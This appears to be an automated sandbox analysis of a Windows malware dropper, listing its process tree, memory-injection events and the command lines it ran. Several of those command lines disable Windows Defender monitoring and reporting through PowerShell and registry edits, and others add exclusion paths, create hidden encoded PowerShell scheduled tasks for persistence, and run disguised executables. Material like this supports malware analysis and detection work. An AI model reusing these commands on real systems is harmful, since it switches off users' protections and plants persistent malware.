Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184
Token: SeCreatePagefilePrivilege	1184
Token: SeShutdownPrivilege	1184

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Tue17f1e3fedead.exe

pid process

4668 Tue17f1e3fedead.exe
4668 Tue17f1e3fedead.exe
4668 Tue17f1e3fedead.exe
4668 Tue17f1e3fedead.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Tue17f1e3fedead.exe

pid process

4668 Tue17f1e3fedead.exe
4668 Tue17f1e3fedead.exe
4668 Tue17f1e3fedead.exe
4668 Tue17f1e3fedead.exe

pid	process
4668	Tue17f1e3fedead.exe
4668	Tue17f1e3fedead.exe
4668	Tue17f1e3fedead.exe
4668	Tue17f1e3fedead.exe

pid	process
4668	Tue17f1e3fedead.exe
4668	Tue17f1e3fedead.exe
4668	Tue17f1e3fedead.exe
4668	Tue17f1e3fedead.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exesetup_installer.exesetup_install.execmd.execmd.execmd.exeWerFault.exe

description	pid	process	target process
PID 3840 wrote to memory of 3468	3840	FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe	setup_installer.exe
PID 3840 wrote to memory of 3468	3840	FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe	setup_installer.exe
PID 3840 wrote to memory of 3468	3840	FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe	setup_installer.exe
PID 3468 wrote to memory of 4884	3468	setup_installer.exe	setup_install.exe
PID 3468 wrote to memory of 4884	3468	setup_installer.exe	setup_install.exe
PID 3468 wrote to memory of 4884	3468	setup_installer.exe	setup_install.exe
PID 4884 wrote to memory of 1288	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 1288	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 1288	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4320	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4320	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4320	4884	setup_install.exe	cmd.exe
PID 1288 wrote to memory of 4344	1288	cmd.exe	powershell.exe
PID 1288 wrote to memory of 4344	1288	cmd.exe	powershell.exe
PID 1288 wrote to memory of 4344	1288	cmd.exe	powershell.exe
PID 4320 wrote to memory of 3396	4320	cmd.exe	powershell.exe
PID 4320 wrote to memory of 3396	4320	cmd.exe	powershell.exe
PID 4320 wrote to memory of 3396	4320	cmd.exe	powershell.exe
PID 4884 wrote to memory of 1456	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 1456	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 1456	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3824	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3824	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3824	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4856	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4856	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4856	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4980	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4980	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4980	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 904	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 904	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 904	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 112	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 112	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 112	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 116	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 116	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 116	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2820	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2820	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2820	4884	setup_install.exe	cmd.exe
PID 1456 wrote to memory of 2676	1456	cmd.exe	Tue175473c2c8157a.exe
PID 1456 wrote to memory of 2676	1456	cmd.exe	Tue175473c2c8157a.exe
PID 1456 wrote to memory of 2676	1456	cmd.exe	Tue175473c2c8157a.exe
PID 4884 wrote to memory of 2604	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2604	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2604	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3820	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3820	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3820	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2120	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2120	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2120	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3540	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3540	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 3540	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2628	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2628	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 2628	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4824	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4824	4884	setup_install.exe	cmd.exe
PID 4884 wrote to memory of 4824	4884	setup_install.exe	cmd.exe
PID 3824 wrote to memory of 4668	3824	WerFault.exe	Tue17f1e3fedead.exe

C:\Users\Admin\AppData\Local\Temp\FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe
"C:\Users\Admin\AppData\Local\Temp\FC45728DCDF75985369C218C0386D8B5E3E49FCBCE67B.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3840

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3468

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:4320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue175473c2c8157a.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1456

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue175473c2c8157a.exe
Tue175473c2c8157a.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:2676

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
6⤵
- Executes dropped EXE
PID:2096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue17f1e3fedead.exe
4⤵
PID:3824

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17f1e3fedead.exe
Tue17f1e3fedead.exe
5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1704dd8cbe507b.exe
4⤵
PID:4856

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1704dd8cbe507b.exe
Tue1704dd8cbe507b.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1764717dab33f7d.exe
4⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue1764717dab33f7d.exe
Tue1764717dab33f7d.exe
5⤵
- Executes dropped EXE
PID:3392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue17aa01b7ad9.exe /mixone
4⤵
PID:112

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue17aa01b7ad9.exe
Tue17aa01b7ad9.exe /mixone
5⤵
- Executes dropped EXE
PID:3524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 624
6⤵
- Program crash
PID:2768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 624
6⤵
- Program crash
- Suspicious use of WriteProcessMemory
PID:3824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 664
6⤵
- Program crash
PID:3460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 776
6⤵
- Program crash
PID:2480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 760
6⤵
- Program crash
PID:1528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 884
6⤵
- Program crash
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1052
6⤵
- Program crash
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1060
6⤵
- Program crash
PID:556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1336
6⤵
- Program crash
PID:1528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue170b93e005bfc7.exe
4⤵
PID:116

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue170b93e005bfc7.exe
Tue170b93e005bfc7.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue176fb5acbe4e.exe
4⤵
PID:904

C:\Users\Admin\AppData\Local\Temp\7zSC8D98246\Tue176fb5acbe4e.exe
Tue176fb5acbe4e.exe
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:1364

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
6⤵
- Executes dropped EXE
PID:4408

C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\Service.exe.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:1356

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5608

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:5600

C:\Users\Admin\Documents\BEEyeleFDUFEbUwJ87FJsPO6.exe
"C:\Users\Admin\Documents\BEEyeleFDUFEbUwJ87FJsPO6.exe"
7⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
PID:5592

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
8⤵
PID:5144

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
8⤵
PID:5328

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\WEKH2.n7
9⤵
PID:5832

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\WEKH2.n7
10⤵
PID:5124

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\WEKH2.n7
11⤵
PID:7044

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\WEKH2.n7
12⤵
PID:6752

C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"
8⤵
PID:5228

C:\Users\Admin\AppData\Local\Temp\7zS5208.tmp\Install.exe
.\Install.exe
9⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\7zS593C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
10⤵
PID:5424

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
11⤵
PID:6236

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
12⤵
PID:6412

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
13⤵
PID:6428

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
13⤵
PID:6720

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
11⤵
PID:6344

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
12⤵
PID:6496

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
13⤵
PID:6688

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
13⤵
PID:6796

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ghgJytiJP" /SC once /ST 05:02:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
11⤵
- Creates scheduled task(s)
PID:6896

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ghgJytiJP"
11⤵
PID:6108

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ghgJytiJP"
11⤵
PID:6324

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bKqtUhAckstRmOkXqo" /SC once /ST 08:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GDRPYdOHWOMIRVQbw\bnDAWlqtvsqsVUM\ReHoYmc.exe\" hO /site_id 525403 /S" /V1 /F
11⤵
- Creates scheduled task(s)
PID:32

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
8⤵
PID:5364

C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"
8⤵
- Executes dropped EXE
PID:5304

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend
9⤵
PID:5484

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Camminato.xla & ping -n 5 localhost
9⤵
PID:5792

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:904

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
11⤵
PID:5340

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
11⤵
- Enumerates processes with tasklist
PID:6080

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla
11⤵
PID:5736

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Plasmare.exe.pif
Plasmare.exe.pif J
11⤵
PID:1132

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Plasmare.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Plasmare.exe.pif Films\AjyTbkN.exe.exe"
12⤵
PID:5188

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
11⤵
- Runs ping.exe
PID:5524

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
10⤵
- Runs ping.exe
PID:1300

C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"
8⤵
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 456
9⤵
- Program crash
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 764
9⤵
- Program crash
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 804
9⤵
- Program crash
PID:6328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 820
9⤵
- Program crash
PID:6660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 828
9⤵
- Program crash
PID:7060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 852
9⤵
- Program crash
PID:6288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 1016
9⤵
- Program crash
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 1376
9⤵
- Program crash
PID:6356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit
9⤵
PID:6548

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte.bmp.exe" /f
10⤵
- Kills process with taskkill
PID:6772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 492
9⤵
- Program crash
PID:6656

C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe"
8⤵
PID:5756

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend
9⤵
PID:1960

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Suo.ppam & ping -n 5 localhost
9⤵
PID:972

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:4184

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
11⤵
- Enumerates processes with tasklist
PID:5168

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
11⤵
PID:6808

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^mIKZUERRcdogxRWVUqrYiUvVLTbpecknKxaeazHqEtakMEgUAbPEdtHFkPhwiIPZyJEZnUCBarxeClouFCIFGHoFMNQDyGTVfaueqgcGVhkhKFrqGivEZpabBYhLrYvMlnNptyu$" Avvelenate.ppam
11⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Disconosci.exe.pif
Disconosci.exe.pif r
11⤵
PID:6200

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Disconosci.exe.pif
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Disconosci.exe.pif Films\wMIKZZJ.exe.exe"
12⤵
PID:6496

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
11⤵
- Runs ping.exe
PID:6340

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
10⤵
- Runs ping.exe
PID:4548

C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"
8⤵
PID:3556

C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
8⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\is-1H89J.tmp\B2BCH2.exe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1H89J.tmp\B2BCH2.exe.tmp" /SL5="$1401EA,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
9⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\is-3EPI7.tmp\djkdj778_______.exe
"C:\Users\Admin\AppData\Local\Temp\is-3EPI7.tmp\djkdj778_______.exe" /S /UID=91
10⤵
PID:6976

C:\Program Files\Windows Portable Devices\PNRBVQGFRY\poweroff.exe
"C:\Program Files\Windows Portable Devices\PNRBVQGFRY\poweroff.exe" /VERYSILENT
11⤵
PID:2628

C:\Users\Admin\AppData\Local\Temp\is-4FO53.tmp\poweroff.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4FO53.tmp\poweroff.tmp" /SL5="$6031C,490199,350720,C:\Program Files\Windows Portable Devices\PNRBVQGFRY\poweroff.exe" /VERYSILENT
12⤵
PID:6792

C:\Program Files (x86)\powerOff\Power Off.exe
"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
13⤵
PID:7144

C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\newfile.exe.exe"
6⤵
- Executes dropped EXE
PID:2916

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\WEKH2.n7
7⤵
PID:4740

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\WEKH2.n7
8⤵
- Loads dropped DLL
PID:5192

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\WEKH2.n7
9⤵
PID:4548

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\WEKH2.n7
10⤵
PID:5620

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4516

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq
7⤵
PID:5304

C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1900

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
7⤵
- Executes dropped EXE
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
8⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\Ygvpfvtkjpbhrqwcbakelpadportable_4_9_82.exe
"C:\Users\Admin\AppData\Local\Temp\Ygvpfvtkjpbhrqwcbakelpadportable_4_9_82.exe"
8⤵
PID:6088

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
9⤵
PID:5752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
9⤵
PID:5324

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
8⤵
PID:5548

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4524

C:\Program Files (x86)\Installoid\installoid.exe
"C:\Program Files (x86)\Installoid\installoid.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2772

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
7⤵
PID:3660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
8⤵
PID:5456

C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4500

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"
6⤵
- Executes dropped EXE
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 452
7⤵
- Program crash
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 764
7⤵
- Program crash
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 772
7⤵
- Program crash
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 816
7⤵
- Program crash
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 824
7⤵
- Program crash
PID:2596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 984
7⤵
- Program crash
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1016
7⤵
- Program crash
PID:5752

